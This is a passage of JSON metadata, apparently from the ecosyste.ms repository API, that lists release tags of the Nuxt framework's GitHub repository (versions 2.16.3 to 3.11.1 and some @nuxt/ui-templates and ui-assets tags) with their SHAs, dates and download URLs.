6ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.